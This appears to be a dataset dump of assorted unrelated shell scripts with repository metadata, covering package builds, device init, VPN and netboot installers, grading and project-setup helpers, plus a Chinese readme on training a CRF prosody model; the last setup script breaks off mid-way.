b2bafb3249c6277d6123207dc1281904af39a2aa | Shell | kozross/rocm-arch | /rocm-cmake/PKGBUILD | UTF-8 | 680 | 2.59375 | 3 | [] | no_license | # Original build: fermyon <antifermion@protonmail.com>
# Maintainer: Markus Näther <naetherm@cs.uni-freiburg.de>
pkgname=rocm-cmake
pkgver=3.3.0
pkgrel=1
pkgdesc="cmake modules for common build tasks needed for the ROCM software stack"
arch=('x86_64')
url="https://github.com/RadeonOpenCompute/rocm-cmake"
license=('MIT')
makedepends=('cmake')
source=("https://github.com/RadeonOpenCompute/rocm-cmake/archive/rocm-$pkgver.tar.gz")
sha256sums=('76ed3ee8e56cf3246011cf7723c2abda539e1136e7e7f6909bfa45d268b8644f')
# Out-of-source CMake configure; the ROCm stack conventionally installs
# under /opt/rocm.
build() {
  mkdir -p "$srcdir/build"
  cd "$srcdir/build"
  cmake -DCMAKE_INSTALL_PREFIX=/opt/rocm \
        "$srcdir/$pkgname-rocm-$pkgver"
}
# Stage the built tree into the packaging root.
package() {
  cd "$srcdir/build"
  make DESTDIR="$pkgdir" install
}
| true |
02cd8732eb3e2f12b70026b2c236ac1620f77825 | Shell | hastly/dev_dough | /start.sh | UTF-8 | 137 | 2.734375 | 3 | [] | no_license | if hash docker-compose 2>/dev/null; then
docker-compose up -d
else
echo Docker compose is not found. Please install docker first.
fi
| true |
21b6a2e34970ac6e8b7e16018a8e76c6c649f668 | Shell | mpromonet/rpi | /gpio/mcp23008 | UTF-8 | 1,198 | 3.75 | 4 | [] | no_license | #! /bin/sh
### BEGIN INIT INFO
# Provides: gpio-mcp23008
# Required-Start:
# Required-Stop:
# Default-Start: 2 3 4 5
# Default-Stop:
# Short-Description: creates MCP23008 device
### END INIT INFO
. /lib/lsb/init-functions
case $1 in
start)
echo "start gpio-mcp23008"
insmod /lib/modules/$(uname -r)/extra/gpio-mcp23008.ko p_base=128
if [ ! -d /sys/class/i2c-dev/i2c-0/device/0-0020/ ]
then
echo "New I2C device MCP23008"
echo "mcp23008 0x20" > /sys/class/i2c-dev/i2c-0/device/new_device
fi
if [ -d /sys/class/gpio/gpiochip128 ]
then
echo "GPIO interface OK"
else
echo "GPIO interface failed"
fi
;;
stop)
echo "stop gpio-mcp23008"
if [ -d /sys/class/i2c-dev/i2c-0/device/0-0020/ ]
then
find /sys/class/i2c-dev/i2c-0/device/0-0020/gpio -name "gpio[0-9]*" -print | sed 's/.*gpio//' | while read gpio
do
echo "Unexport GPIO $gpio"
echo $gpio > /sys/class/gpio/unexport
done
echo "Delete I2C device MCP23008"
echo "0x20" > /sys/class/i2c-dev/i2c-0/device/delete_device
fi
rmmod gpio-mcp23008.ko
;;
*)
echo "usage: $0 {start|stop}"
esac
| true |
0b1e663e9318771076dc6438b890ace849541d5d | Shell | alegemaate/QIES | /frontend/tests/rename_files.sh | UTF-8 | 302 | 4 | 4 | [] | no_license | #!/bin/bash
# Counter of files renamed.
changed=0
# Ensure exactly two arguments: old file name and new file name.
if [ $# -eq 2 ]; then
  # Use find -print0 with a NUL-delimited read so paths containing spaces
  # or newlines stay intact (the original for-loop over $(find ...) would
  # word-split them), and quote "$1" so it is not glob-expanded.
  while IFS= read -r -d '' line; do
    DIR=$(dirname "${line}")
    mv -- "$line" "${DIR}/${2}"
    changed=$((changed+1))
  done < <(find . -iname "$1" -print0)
else
  echo "Arguments must be old file name and new file name"
fi
echo "${changed} files changed."
echo "${changed} files changed." | true |
05b558ca512526871d0f1ac748c4e5b78f474fdc | Shell | xiongyihui/wav-aec | /run-wav-ns.sh | UTF-8 | 437 | 3.21875 | 3 | [] | no_license | #!/bin/bash
# Require exactly five arguments.
if [ "$#" -ne 5 ]; then
	echo "Usage $(basename "$0") <in.wav> <channel> <out.wav> <in_rate> <out_rate>"
	exit 1
fi
in_sr="$4"
out_sr="$5"
# Directory holding the compiled webrtc-audioproc binary, next to this script.
builddir="${BASH_SOURCE[0]%/*}/build"
# Run WebRTC noise suppression only (-filter_ns with -ns_level 3).  sox
# extracts the requested channel of the input WAV as raw signed 16-bit PCM
# and feeds it to -near_in via process substitution; a second sox encodes
# the processed raw stream on -near_out back into the output WAV.
"$builddir/webrtc-audioproc" -filter_ns -ns_level 3 -in_sr "$in_sr" -out_sr "$out_sr" -near_in <(exec sox -DR "$1" -r $in_sr -t raw -e signed-integer -b 16 - remix "$2") -near_out >(exec sox -DR -r $out_sr -t raw -e signed-integer -b 16 - "$3")
| true |
68c66726e9877dc2201296417c21ebd7a66cf9e6 | Shell | Jvlythical/ECS40 | /hw3/hw3-self/backup/grade.sh | UTF-8 | 1,221 | 3.953125 | 4 | [] | no_license | #!/bin/bash
# Usage:
#
# sh ./grade.sh ~/project
#
# where 'project' is the directory containing your source (mscp.cpp etc.)
if [ "$#" -ne 1 ]; then
	echo "Usage: $0 directory" >&2
	echo "  (directory should contain your mscp.cpp etc.)" >& 2
	exit 1
fi
# Kill the student binary if it runs longer than this.
TIMEOUT=60s
# Start from a clean slate.
rm -f *.o mscp mscp.reference ref.out
# time.c provides the replacement linked in via the linker's --wrap=time
# option below -- presumably to make time() deterministic so outputs are
# comparable; see time.c to confirm.
gcc -w -c time.c -o time.o
# Try a strict build first (-Wall -Werror), then fall back to a permissive one.
if g++ -Wall -Werror -ansi -Xlinker --wrap=time -I$1 $1/*.cpp time.o -o mscp;
then
	echo "Compile succeeded without warnings"
elif g++ -ansi -Xlinker --wrap=time -I$1 $1/*.cpp time.o -o mscp;
then
	echo "Compile succeeded with warnings"
else
	echo "Compile failed"
	exit 1
fi
# Build the reference solution with the same time() wrapper.
gcc -w -c reference.c -o reference.o
gcc -Xlinker --wrap=time reference.o time.o -o mscp.reference
./mscp.reference < input > ref.out
# Run the student binary on the same input, bounded by TIMEOUT.
timeout -k $TIMEOUT $TIMEOUT ./mscp < input > out
# Compare outputs with increasingly lenient methods.
if cmp -s ref.out out;
then
	echo "Output matches reference (cmp byte-by-byte comparison)"
elif diff -q ref.out out > /dev/null;
then
	echo "Output matches reference (diff comparison)"
elif diff -q -w -i -E -B -t ref.out out > /dev/null;
then
	echo 'Output matches reference ignoring whitespace (diff comparison)'
else
	echo 'Output does NOT match'
	echo "Look at 'out' and 'ref.out' for more information"
fi
| true |
caaf99b5ad6e30dfc758dcfc0ce10692e78d4807 | Shell | freebsd/freebsd-ports | /www/sahi/files/sahi.sh.in | UTF-8 | 502 | 3 | 3 | [
"BSD-2-Clause"
] | permissive | #!/bin/sh
# First run: seed the user's Sahi data directory from the shared template.
# (%%DATADIR%%, %%BROWSER%%, %%JAVA_HOME%% are placeholders substituted by
# the FreeBSD port at build time.)
if [ ! -d ${HOME}/.sahi ] && [ -z "${SAHI_USERDATA_DIR}" ]; then
    cp -r %%DATADIR%%/userdata ${HOME}/.sahi
    chmod u+w ${HOME}/.sahi/config/*
    export SAHI_USERDATA_DIR=${HOME}/.sahi
fi
# Fall back to the port-configured browser when none is set.
if [ -z "${BROWSER}" ]; then
    export BROWSER=%%BROWSER%%
fi
# Sahi acts as a local HTTP proxy on port 9999.
if [ -z "${http_proxy}" ]; then
    export http_proxy=http://localhost:9999
fi
# Default the data dir if the first-run branch above did not set it.
if [ -z "${SAHI_USERDATA_DIR}" ]; then
    export SAHI_USERDATA_DIR=${HOME}/.sahi
fi
# Replace this shell with the dashboard, with JAVA_HOME pinned by the port.
exec /usr/bin/env JAVA_HOME=%%JAVA_HOME%% ${SAHI_USERDATA_DIR}/bin/start_dashboard.sh
| true |
a708e893754961c241045641d7f34dcec94667a1 | Shell | foolean/pxe | /tools/get_openbsd_netboot | UTF-8 | 7,471 | 4.03125 | 4 | [] | no_license | #!/bin/bash
#
# FILENAME: get_openbsd_netboot
# AUTHOR: Bennett Samowich <bennett@foolean.org>
# DATE: 2012-04-19
#
# DESCRIPTION:
# Download OpenBSD netboot images. The script will always download the
# current active netboot images. Running this script from cron(1) will
# ensure that your netboot images are always current, including the new
# releases as they are made available.
#
# This script will also create a 'etc' directory within directory of each
# release. A 'boot.conf' and 'random.seed' file will be created inside
# the 'etc' directory. Activating a specific version will be a matter of
# symlinking the release's etc directory to the root of the tftp tree.
#
################################################################################
# Define some variables
ARCH_LIST="amd64"; # Placeholder for the list of architectures to download
FIRMWARE_LIST=""; # Placeholder for the list of firmware to download
RELEASE_LIST=""; # Placeholder for the list of releases to download
CUSTOM_RELEASE_LIST=0; # Flag to denote that we have a custom release list
DEBUG=0; # Turn on debugging output
ERROR=0; # Error flag used during argument processing
VERBOSE=0; # Turn on verbose output
PRUNE=0; # Prune old releases
OSNAME="openbsd"; # Operating system name
WGET_VERBOSE="--quiet"; # Placeholder for wget verbosity
# User and group who will own the downloaded image files
USER="tftp"
GROUP="tftp"
# List of image related files to download
IMAGE_FILES="pxeboot bsd.rd"
# Poth to the directory where the netboot files will be stored
PKGDIR="/srv/tftp/packages"
# Logging macro
LOGGER="/usr/bin/logger -it \"$(basename $0)\""
# Get the list of active OpenBSD releases
RELEASE_LIST=$(wget -qO - http://ftp.openbsd.org/pub/OpenBSD | \
grep "href=\"[0-9]" | sed -e 's/^.*">//' -e 's/\/<.*//' | \
grep "^[0-9]" | sort -u | sed -e ':a;N;$!ba;s/\n/ /g')
# debug - helper routine to print debugging messages
# debug - emit a debugging message, but only when debugging is enabled
# (DEBUG=1).  Always returns success, like the original if/fi form.
debug() {
    [ "${DEBUG}" -eq 1 ] && echo "debug: $*" || true
}
# error - log an error via ${LOGGER} and print it for the user.
# Diagnostics now go to stderr so they are never mixed into captured stdout.
error() {
    ${LOGGER} "error: $*"
    echo "error: $*" >&2
}
# notice - log an informational message via ${LOGGER} (always) and echo it
# to stdout only when verbose output was requested (VERBOSE=1, set by -v/-d).
notice() {
    ${LOGGER} "notice: $*"
    if [ "${VERBOSE}" -eq 1 ]; then
        echo "notice: $*"
    fi
}
# usage - how to use this script
usage() {
echo "Usage: $0 [ OPTIONS ]"
echo ""
echo "Where:"
echo " -a [ ARCH ] Architecture to download netboot files for"
echo " (default: ${ARCH_LIST})"
echo " -d Print debugging output (includes -v too)"
echo " -g [ GROUP ] Group that should own the netboot files"
echo " (default: ${GROUP})"
echo " -h Print this message"
echo " -o [ OWNER ] Username that should own the netboot files"
echo " (default: ${USER})"
echo " -p [ DIR ] Root path to store the netboot files"
echo " (default: ${PKGDIR})"
echo " -P Prune EOL releases"
echo " -r [ RELEASE ] Operating sytem release to download"
echo " (default: ${RELEASE_LIST})"
echo " -v Print more verbose output"
exit 1
}
# Parse command-line arguments
while getopts "a:dhg:r:o:p:Pv" OPTION
do
case $OPTION in
a)
ARCH_LIST=$(echo $OPTARG | tr '[:upper:]' '[:lower:]');;
d)
DEBUG=1
VERBOSE=1
PROGRESS="--progress"
;;
g)
GROUP=$OPTARG;;
o)
USER=$OPTARG;;
p)
PKGDIR=${OPTARG};;
P)
PRUNE=1;;
r)
RELEASE_LIST=$(echo $OPTARG | tr '[:upper:]' '[:lower:]')
CUSTOM_RELEASE_LIST=1
;;
v)
VERBOSE=1
WGET_VERBOSE="--progress=bar"
;;
?)
usage;;
esac
done
# Make sure we have what we need
if [ "${ARCH_LIST}" == "" ]; then
error "Must specify an architecture type (-a)"
ERROR=1
fi
if [ "${RELEASE_LIST}" == "" ]; then
error "Must specify a release (-r)"
ERROR=1
fi
if [ ${ERROR} -eq 1 ]; then
usage
exit 1; # Should never get here
fi
# Debugging output
debug "ARCH_LIST = ${ARCH_LIST}"
debug "RELEASE_LIST = ${RELEASE_LIST}"
debug "USER = ${USER}"
debug "GROUP = ${GROUP}"
debug "PATH = ${PKGDIR}"
# Ensure our package directory exists
mkdir -p "${PKGDIR}"
chmod -R u-wx,u+rwX,go-rwx "${PKGDIR}"
# Release loop: Iterate over the list of releases
for RELEASE in ${RELEASE_LIST}
do
debug "Getting netboot images for ${RELEASE}"
# Architecture loop: Iterate over the list of architectures
for ARCH in ${ARCH_LIST}
do
# Download the image files for this release and architecture
debug "Getting netboot images for ${RELEASE} ${ARCH}"
# Source path to the netboot images
IMAGE_SRC="http://ftp.openbsd.org/pub/OpenBSD/${RELEASE}/${ARCH}"
# Destination path for the release images
RELEASE_DIR="${PKGDIR}/${OSNAME}/${RELEASE}/${ARCH}"
# Create the destination directory for the release image
debug "Creating '${RELEASE_DIR}'"
mkdir -p "${RELEASE_DIR}"
# Image loop: Iterate over the list of image files
for IMAGE_FILE in ${IMAGE_FILES}
do
debug "Dowloading ${IMAGE_FILE} for ${RELEASE} ${ARCH}"
# Download the image file
notice "Downloading '${IMAGE_SRC}/${IMAGE_FILE}'"
wget "${WGET_VERBOSE}" \
-O "${RELEASE_DIR}/${IMAGE_FILE}" "${IMAGE_SRC}/${IMAGE_FILE}"
if [ "${IMAGE_FILE}" == "pxeboot" ]
then
mv "${RELEASE_DIR}/${IMAGE_FILE}" \
"${RELEASE_DIR}/${IMAGE_FILE}.0"
fi
done; # Image loop
# Create the /etc directory
notice "Creating /etc directory for ${RELEASE} ${ARCH}"
if [ ! -d "${RELEASE_DIR}/etc" ]
then
mkdir "${RELEASE_DIR}/etc"
fi
# Create the boot.conf file
notice "Creating boot.conf for ${RELEASE} ${ARCH}"
echo "set image packages/openbsd/${RELEASE}/amd64/bsd.rd" \
> "${RELEASE_DIR}/etc/boot.conf"
# Create the random.seed file
notice "Creating random.seed for ${RELEASE} ${ARCH}"
dd if=/dev/random of="${RELEASE_DIR}/etc/random.seed" \
bs=512 count=1 status=noxfer
done; # Architecture loop
done; # Release loop
# Set owner and permissions on the directories and files
chown -R ${USER}:${GROUP} "${PKGDIR}/${OSNAME}"
chmod -R go-rwx "${PKGDIR}/${OSNAME}"
chmod -R u+rwX "${PKGDIR}/${OSNAME}"
# Prune directories not part of the current release list
if [ ${CUSTOM_RELEASE_LIST} -eq 0 ] && [ ${PRUNE} -eq 1 ]; then
EOL_RELEASES=$(find "${PKGDIR}/${OSNAME}/"* -type d -prune \
-exec basename {} \; | sort -u | \
sed -e ':a;N;$!ba;s/\n/ /g')
for RELEASE in ${RELEASE_LIST}
do
EOL_RELEASES=$(echo "${EOL_RELEASES}" | sed -e "s/${RELEASE}//")
done
debug "EOL_RELEASES = '${EOL_RELEASES}'"
for EOL_RELEASE in ${EOL_RELEASES}
do
notice "Cleaning up EOL/EOS release '${EOL_RELEASE}'"
rm -rf "${PKGDIR}/${OSNAME}/${EOL_RELEASE}"
done
fi
| true |
80d102293d185b09b4e7dfe269c0c6d1f840aa04 | Shell | darkshellcode/bash-progress-indicator | /main.sh | UTF-8 | 372 | 3.15625 | 3 | [
"MIT"
] | permissive | #!/bin/bash -e
# shellcheck disable=SC1091
declare -rx STEPS=(
'pre-install'
'install'
'post-install'
)
declare -rx CMDS=(
'sleep 1'
'sleep 1'
'sleep 1'
)
case $1 in
progress)
. 'progress.sh'
;;
progress_advanced)
. 'progress_advanced.sh'
;;
spinner*)
. 'spinner.sh'
;;
*)
echo "Invalid option $1!"
exit 1
esac
start
| true |
405e8bbd6e656d0b59dbd570d2d439eef5316c26 | Shell | c0ns0le/bootstrap | /openvpn.sh | UTF-8 | 1,289 | 2.953125 | 3 | [] | no_license | #!/bin/sh
set -e -x
# Already installed?  Bail out early.
if [ -d /cygdrive/c/Program\ Files/OpenVPN ]; then
	echo 'openvpn already installed?'
	exit 0
fi
# The latest version is always at (download the XP-compatible build):
# https://openvpn.net/index.php/open-source/downloads.html
# TODO: fix this later, because it does not work (also beware of the
# different driver for Windows 8).  The architecture check below is
# disabled; the 64-bit installer is always used.
#if [ "`uname -a | grep WOW64`" ]; then
	EXE='openvpn-install-2.3.7-I002-x86_64.exe'
#else
#	EXE='openvpn-install-2.3.7-I002-i686.exe'
#fi
wget -c --tries=10 http://swupdate.openvpn.org/community/releases/$EXE
chmod a+x $EXE
echo
# (Czech) "It will probably complain about trustworthiness now - confirm it!"
echo '!!! TED TO ASI VYBLIJE HLASKU O DUVERYHODNOSTI - POTVRD TO! !!!'
./$EXE /S
rm $EXE
rm -f /cygdrive/c/Users/Public/Desktop/OpenVPN*lnk || true
# Find the freshly created TAP adapter's name and rename it.
IFACE=`/cygdrive/c/Program\ Files/OpenVPN/bin/openvpn.exe --show-adapters | tail -n 1 | cut -f 2 -d"'"`
netsh interface set interface "$IFACE" newname = "asterix_openvpn"
/cygdrive/c/atxpkg/atxpkg install openvpn-asterix --yes
sc config OpenVPNService start= auto
# Restart the service automatically on failure (3 retries, 10 min apart,
# failure counter reset daily).
sc failure "OpenVPNService" actions= restart/600000/restart/600000/restart/600000 reset= 86400
net start OpenVPNService
echo
# (Czech) "Waiting 10s"
echo '!!! CEKAM 10s !!!'
sleep 10
echo
# (Czech) "Check the address"
echo '!!! ZKONTROLUJ ADRESU !!!'
netsh int ip show addresses asterix_openvpn
netsh int ipv6 show addresses asterix_openvpn
schtasks /delete /tn "OpenVPN" /f || true
| true |
10e6085cc4fbf216183b38c68e99cf0822713755 | Shell | woodruffw/snippets | /rip/rip | UTF-8 | 713 | 4.15625 | 4 | [
"LicenseRef-scancode-proprietary-license",
"MIT"
] | permissive | #!/usr/bin/env bash
# rip: quick rip an audio CD into a specified format using abcde
# installed NAME - succeed iff NAME resolves to an existing executable file.
# NOTE(review): `cmd` is not declared local, and the trailing `return ${?}`
# is redundant (a function already returns the status of its last command).
function installed() {
	cmd=$(command -v "${1}")
	[[ -n "${cmd}" ]] && [[ -f "${cmd}" ]]
	return ${?}
}
# fatal MSG... - print the message to stderr and exit with status 2.
function fatal {
	>&2 echo "Fatal: ${*}"
	exit 2
}
# Require a format argument and the abcde ripper itself.
[[ -n "${1}" ]] || fatal "Usage: $(basename "${0}") <format>"
installed abcde || fatal "Missing abcde for ripping."
# Normalize the requested format to lower case, then check for its encoder.
format=$(echo "${1}" | tr "[:upper:]" "[:lower:]")
case "${format}" in
	"mp3" ) installed lame || fatal "Missing lame for MP3 encoding." ;;
	"flac" ) installed flac || fatal "Missing flac for FLAC encoding." ;;
	* ) fatal "Unsupported format: ${format}. Maybe use abcde directly?"
esac
# Rip: query CDDB, read, encode, tag, move, clean up.
abcde -Vx -a "cddb,read,encode,tag,move,clean" -o "${format}"
| true |
ea87885615ceefe72655ae9183ec5836943ad33c | Shell | rulorules99/angular-scaffolding | /init_repo | UTF-8 | 259 | 2.921875 | 3 | [] | no_license | #!/usr/bin/env bash
# Re-initialize the current directory as a fresh git repository and push it
# to the given remote.  Usage: init_repo <remote-repo-url>
if [[ $# -eq 0 ]]; then
    echo 'you must supply a repo path' >&2
    exit 1      # missing argument is an error (original exited 0 here)
fi
repo=$1
sudo rm -r .git
git init
git add -A
git commit -m "first commit"
git remote add origin "$repo"   # quoted so URLs with special chars survive
git push -u origin master
# Remove scaffolding files that should not live in the new repo.
rm ./.travis.yml
rm ./init_repo
exit 0      # original ended with `exit 1`, reporting failure on success
33db69cce4fba7abc94ce39c69aaa96637a7a3e6 | Shell | ramonpichardo/scripts-bash | /nfs-share-setup-macos.sh | UTF-8 | 432 | 3.546875 | 4 | [] | no_license | #!/usr/bin/env bash
# Enable an NFS share on a Mac
# Run this script with elevated privileges (i.e., sudo or as root)
# NOTE(review): the exported path and the subnet below are hard-coded;
# adjust them before running on another machine.
# 1. Create a file named "exports" in directory /etc:
touch /etc/exports
# 2. Add the following string to the file /etc/exports:
# NOTE(review): ">" overwrites the whole file, discarding any existing exports.
echo "/Volumes/Storage02/video -network 192.168.0.0 -mask 255.255.255.0" > /etc/exports
# 3. Enable NFS:
nfsd enable
# 4. Verify which folders are being shared by NFS:
showmount -e
| true |
9b03b38928a0a99fe460e0dff3aeb98113bc9642 | Shell | gundour/ssh_socks5_droplet | /start.sh | UTF-8 | 2,087 | 3.8125 | 4 | [] | no_license | #!/bin/bash
# Start a new droplet to be used as a socks5 proxy machine
# Prerequisites
# 1- generate API token and login with the generated token
# 2- install "doctl" locally
# Token String
# Uncomment the following line to use this script with API Token
# ssh private key path
SSH_KEY_NAME="socks5"
SSH_KEY_PATH=~/.ssh/${SSH_KEY_NAME}_key
# Machine sizes can be optained by running this command in terminal.
# $ doctl compute size list
size="s-1vcpu-1gb"
# Configure image type or use a snapshot
# Available images can be optained by running this command in terminal.
# $ doctl compute image list --public
image="ubuntu-16-04-x64"
# Configure Region
# Available regions can be optained by running this command in terminal.
# $ doctl compute region list
region="nyc1"
# Image name
droplet_name="socks5-machine"
# Create new ssh key and add the key to user account
# echo "Creating new ssh key"
#
ssh-keygen -t rsa -b 4096 -f $SSH_KEY_PATH -q -N "" # create new ssh key
SSH_KEY_DATA="$(doctl compute ssh-key create $SSH_KEY_NAME --public-key "$(cat $SSH_KEY_PATH.pub)" \
--format Name,FingerPrint | grep $SSH_KEY_NAME)"
echo "${SSH_KEY_DATA}"
SSH_key_FingerPrint=${SSH_KEY_DATA#$SSH_KEY_NAME } # created ssh key fingerprint
# Start the droplet
echo "Starting new droplet"
doctl compute droplet create $droplet_name --size $size --image $image \
--region $region --ssh-keys $SSH_key_FingerPrint --wait
droplet_data="$(doctl compute droplet list --format Name,PublicIPv4 | grep $droplet_name)"
echo "${droplet_data}"
droplet_ip=${droplet_data#$droplet_name } # droplet public ip
###########################################################################################
###########################################################################################
###########################################################################################
# Socks5 proxy configuration
echo "Socks5 Connect"
PORT=8123
echo "ssh -i $SSH_KEY_PATH -D $PORT -q -f -C -N -y root@$droplet_ip"
ssh -i $SSH_KEY_PATH -D $PORT -q -f -C -N root@$droplet_ip
ps aux | grep ssh
| true |
beb7eeab21998a874e3f849cbe1944ee51aeb196 | Shell | cash2one/crf_test | /crf_test/readme_lucheng.sh | UTF-8 | 3,697 | 2.96875 | 3 | [] | no_license | 本文档主要对韵律模型训练流程进行简单说明
第一步:处理语料
在该步骤,需要提供手工标注的韵律训练语料,并按照统一的格式存储在train_corpus.txt中。具体格式样例如下:
姜 还是 老的辣$一位 教|社会学的 老师$打了 个|幽默的 比喻 说
一千|四百 二十一 语丝$不惜|牺牲 自由$以图 苟安的 人
魏格登 先生$每听到|前门的 小铃$发出|轻微的|叮当声
其中,空格表示韵律词结尾,|符号表示次韵律短语结尾(二级韵律短语结尾),
$符号表示主韵律短语结尾(一级韵律短语结尾)。句尾不需要标记,直接回车。
特别注意,该语料不能有多余的空格。
此外,除了上述符号及相应的汉字文本外,不能包含其它符号(标点符号已经过滤,所有阿拉伯数字、特殊符号已经经过正则化处理)。
除了上述文本语料外,另需准备train_corpus_tagged.txt文件,
按照与train_corpus.txt逐行对应的方式存储相应训练语料的分词、词性标注结果。
该分词过程可以采用任意分词工具,词性标注符号也没有限制。只是要注意训练过程采用的工具及使用过程采用的工具要统一。
准备好上述工具后,依照顺序分别执行step1.py至step4.py
(需要采用python3.2以上版本,本人在windows下测试通过)。
执行完毕后,即可生成三个训练文件:pw_train.txt,pp_train.txt,ip_train.txt,用于训练crf模型。
其中pw,pp,ip分别对应韵律词、二级韵律短语、一级韵律短语
第二步:模型训练
首先安装crfpp工具(linux环境下)。
安装完毕后,新建训练文件夹,并将训练语料pw_train.txt,pp_train.txt,ip_train.txt拷入该文件夹。
同时,将“第二步_训练模型”文件夹下的模板“template_pp”及“template_pp”也拷入该文件夹。执行如下过程
LD_LIBRARY_PATH=/usr/local/lib:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH
./crf_learn -c 4.0 -f 5 -t template_pw pw_train.txt model_pw
./crf_learn -c 4.0 -f 5 -t template_pp pp_train.txt model_pp
./crf_learn -c 4.0 -f 3 -t template_pp ip_train.txt model_ip
其中,pp及ip的训练过程采用同一个模板文件。
训练完成后,会生成相应的模型文件。
我们须保留相应的文本格式版本,分别命名为model_pw.txt,model_pp.txt,model_ip.txt,该文件经过后续格式处理后,即可在引擎中使用。
第三步:模型后处理
上述过程生成的文件格式存在冗余,我们消除冗余后,按照自定义的方式进行存储,即可在引擎中使用。
该过程采用postprocess.py工具。我们可以看到model_pw.txt,model_pp.txt,model_ip.txt三个文件大体格式分为如下部分:
version: 100
cost-factor: 1
maxid: 42044
xsize: 5
0
1
U00:%x[-2,0]
U01:%x[-1,0]
........
0 U00:_B-1
2 U00:_B-2
4 U00:啊
6 U00:阿
........
0.1846607464257579
-0.1846607464258724
0.2134598654958623
-0.2134598654960214
..............
我们手工的把上述文件拆成两部分,分别对应temp1.txt和temp2.txt。
其中,temp1.txt对应如下部分:
0 U00:_B-1
2 U00:_B-2
4 U00:啊
6 U00:阿
........
temp2.txt对应如下部分:
0.1846607464257579
-0.1846607464258724
0.2134598654958623
-0.2134598654960214
..............
即,temp1.txt对应所有的特征信息,temp2.txt对应相应的特征权重。
此时,执行postprocess.py,即可生成generated_model.txt,该模型就是当前引擎支持的模型结构,修改文件名后即可在引擎中使用。
| true |
027a81d1e1379c36a2a42a0ac7b8bdeb831a4e59 | Shell | macintacos/dotfiles | /setup/macos/arc | UTF-8 | 387 | 2.515625 | 3 | [] | no_license | #!/usr/bin/env bash
# Arc browser setup: expose the repo-local helper scripts and teach
# Keyboard Maestro to drive Arc through its Google Chrome integration.

# Prepend ./setup so sibling helpers (e.g. `log`) resolve first.
export PATH="$PWD/setup:$PATH"

log info "Updating Arc-related metadata..."
log info "Make sure that Keyboard Maestro recognizes Arc"

# Point Keyboard Maestro's Chrome AppleScript hooks at Arc's bundle id
# and display name.
defaults write com.stairways.keyboardmaestro.engine AppleScriptGoogleChromeBundleID -string "company.thebrowser.Browser"
defaults write com.stairways.keyboardmaestro.engine BrowserGoogleChromeName -string "Arc Browser"
| true |
c95635a842e0fd4a4611da9d29068170a9e79cf3 | Shell | yugeta/cympfh.github.io | /c++/bin/cpp2html | UTF-8 | 149 | 2.578125 | 3 | [] | no_license | #!/bin/bash
# cpp2html — wrap a C++ source file in a ```cpp fenced block and render it
# to standalone HTML with pandoc. Output is written next to the input as
# <input>.html.
#
# Usage: cpp2html FILE.cpp

if [ $# -lt 1 ] || [ ! -f "$1" ]; then
    echo "usage: $0 FILE.cpp" 1>&2
    exit 1
fi

# Use a private temp file instead of the fixed, world-predictable
# /tmp/cpphtml.md, and remove it on every exit path.
TMPMD=$(mktemp) || exit 1
trap 'rm -f -- "$TMPMD"' EXIT

# Leading blank line preserved from the original (`echo > $TMPMD`).
{
    echo
    echo "\`\`\`cpp"
    cat -- "$1"
    echo "\`\`\`"
} > "$TMPMD"

# NOTE(review): pandoc's -i is --incremental; the input file is the
# positional "$TMPMD" argument — confirm -i is actually intended here.
pandoc -s -i "$TMPMD" -o "$1.html"
| true |
e4534307a0b70ca33e5557d4d396e976b70d73f4 | Shell | particl/ccs-setup | /setup.sh | UTF-8 | 5,973 | 3.03125 | 3 | [] | no_license | echo "CROWDFUNDING SETUP SCRIPT"
echo "[*] INSERT HOSTNAME (e.g crowdfund.particl.io)"
read -r HOSTNAME
HOSTNAME=${HOSTNAME:-localhost}

echo "[*] INSERT FRONT REPO URL (e.g https://github.com/particl/ccs-front)"
read -r FRONT_REPO_URL
FRONT_REPO_URL=${FRONT_REPO_URL:-https://github.com/kewde/ccs-front}
echo "$FRONT_REPO_URL"

# Check if the directory exists, else clone it.
# BUG FIX: these guards used `-f`, which never matches a *directory* —
# git clone creates a directory, so on re-runs the guard never fired and
# the clone failed. `-e` matches any existing path.
D=./data/nginx/ccs-front
if [ -e "$D" ]; then
    echo "$D already exists, aborting."
    exit
else
    echo "[*] CLONING FRONTEND REPO"
    git clone "$FRONT_REPO_URL" "$D"
fi

echo "[*] INSERT BACK REPO URL (e.g https://github.com/particl/ccs-back)"
read -r BACK_REPO_URL
BACK_REPO_URL=${BACK_REPO_URL:-https://github.com/kewde/ccs-back}

# Check if the directory exists, else clone it.
D=./data/nginx/ccs-back
if [ -e "$D" ]; then
    echo "$D already exists, aborting."
    exit
else
    echo "[*] CLONING BACKEND REPO"
    git clone "$BACK_REPO_URL" "$D"
fi

echo "[*] INSERT PROPOSALS REPO URL (e.g https://github.com/particl/ccs-proposals)"
read -r PROP_REPO_URL
PROP_REPO_URL=${PROP_REPO_URL:-https://github.com/kewde/ccs-proposals}

# Check if the directory exists, else clone it.
D=./data/nginx/ccs-back/storage/app/proposals
if [ -e "$D" ]; then
    echo "$D already exists, aborting."
    exit
else
    echo "[*] CLONING PROPOSAL REPO"
    git clone "$PROP_REPO_URL" "$D"
fi

echo "[*] INSERT GITHUB USERNAME (e.g kewde)"
read -r GITHUB_USERNAME
GITHUB_USERNAME=${GITHUB_USERNAME:-kewde}

echo "[*] INSERT GITHUB ACCESS TOKEN (retrieve 'repo' token from GitHub: https://github.com/settings/tokens/new)"
read -r GITHUB_ACCESS_TOKEN
GITHUB_ACCESS_TOKEN=${GITHUB_ACCESS_TOKEN:-SECRET}

echo "[*] INSERT DB BACKUP REPO URL WIHTOUT HTTPS:// (e.g github.com/particl/ccs-db)"
read -r BACKUP_REPO_URL
BACKUP_REPO_URL=${BACKUP_REPO_URL:-github.com/kewde/ccs-db}

# Check if the directory exists, else clone it (token embedded in the URL
# so the periodic backup push from cron.py can authenticate).
D=./data/nginx/ccs-db
if [ -e "$D" ]; then
    echo "$D already exists, aborting."
    exit
else
    echo "[*] CLONING BACKUP REPO"
    git clone "https://${GITHUB_USERNAME}:${GITHUB_ACCESS_TOKEN}@$BACKUP_REPO_URL" "$D"
fi

echo "[*] GENERATE SECRETS"

echo " [*] GENERATING MYSQL ROOT PASSWORD"
MYSQL_ROOT_PASSWORD=$(tr -dc '[:alnum:]' < /dev/urandom | head -c20)
echo " MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PASSWORD}"

echo " [*] GENERATING MYSQL USER PASSWORD"
MYSQL_USER_PASSWORD=$(tr -dc '[:alnum:]' < /dev/urandom | head -c20)
echo " MYSQL_USER_PASSWORD=${MYSQL_USER_PASSWORD}"

echo " [*] GENERATING PARTICLD USER PASSWORD"
